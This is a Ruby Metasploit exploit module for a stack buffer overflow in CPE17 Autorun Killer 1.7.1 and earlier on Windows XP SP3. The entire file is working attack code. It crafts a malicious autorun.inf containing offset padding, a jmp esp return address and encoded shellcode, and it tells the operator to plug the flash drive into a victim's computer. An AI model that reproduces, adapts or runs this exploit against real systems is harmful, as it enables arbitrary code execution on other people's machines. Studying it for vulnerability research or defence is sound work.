#
# CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
# by Xelenonz
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
      include Msf::Exploit::FILEFORMAT
 
      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit',
                        'Description'    => %q{
                                        readfile function is vulnerable it can be overflow 
                                             },
                        'Author'         => [ 'Xelenonz' ],
                        'Version'        => '0.1',
                         
                        'Payload'        =>
                                {
                                        'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
                                        'EncoderOptions' => {'BufferRegister'=>'ECX'},
                                },
            'DefaultOptions' =>
                                {
                                'DisablePayloadHandler' => 'true',
                                },
                        'Platform'       => 'windows',
 
                        'Targets'        =>
                                [
                                        [
                                            'Windows XP SP3',
                                                {   'Ret' => 0x775a676f,
                                                    'Offset' => 500
                                                }
                                       ],
                                       
                                ],
                        'DefaultTarget' => 0,
 
                        'Privileged'     => false
                        ))
 
                        register_options(
                        [
                            OptString.new('FILENAME',   [ true, 'The file name.',  'autorun.inf']),
                        ], self.class)
       end
 
       def exploit
          print_status("Encoding Payload ...")
          enc = framework.encoders.create("x86/alpha_mixed")
          enc.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
          hunter = enc.encode(payload.encoded, nil, nil, platform)
          buffer = ""
          buffer << "A"*target['Offset'] # padding offset
          buffer << [target.ret].pack('V') # jmp esp
          buffer << hunter # shellcode
          print_status("Creating '#{datastore['FILENAME']}' file ...")
          file_create(buffer)
          print_status("Plug flashdrive to victim's computer")
          handler
           
       end
end